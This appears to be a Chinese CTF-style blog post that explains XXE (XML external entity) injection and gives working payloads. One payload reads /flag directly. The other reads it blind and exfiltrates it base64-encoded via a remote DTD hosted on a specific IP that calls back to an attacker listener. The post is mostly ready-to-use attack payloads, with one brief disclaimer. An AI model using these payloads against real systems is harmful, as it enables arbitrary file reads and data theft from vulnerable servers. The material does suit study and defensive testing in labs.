🎼个人主页:金灰
😎作者简介:一名简单的大一学生;易编橙·终身成长社群的嘉宾.✨
专注网络空间安全服务,期待与您的交流分享~
感谢您的点赞、关注、评论、收藏、是对我最大的认可和支持!❤️
🍊易编橙·终身成长社群🍊 : http://t.csdnimg.cn/iSLaP 期待您的加入~
免责声明:本文仅做分享...
目录
XXE认识
xxe的利用
XML Entity (实体注入)
当程序处理xml文件时,没有禁止对外部实体的处理,容易造成xxe漏洞.
危害:
主流是任意文件读取
XML 文件:
一般表示带有结构的数据
多级,分层
xml格式
利用:
1 有回显时文件读取方法
抓包,改POST方法---->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE hacker[
<!ENTITY hacker SYSTEM "file:///flag">
]> //定义hacker变量
<root>
<ctfshow>
&hacker; //执行hacker
</ctfshow>
</root>
2 无回显时文件读取方法
外带
---------------------------------------------
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE hacker[
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/flag">
<!ENTITY % myurl SYSTEM "http://43.154.107.226/test.dtd">
%myurl;
]>
<root>
1
</root>
----------------------------------------------
远程test.dtd内容:
<!ENTITY % dtd "<!ENTITY % vps SYSTEM 'http://IP:3389/%file;'> ">
%dtd;
%vps;
------------------------------------------------
服务端监听,
#tail -F access.log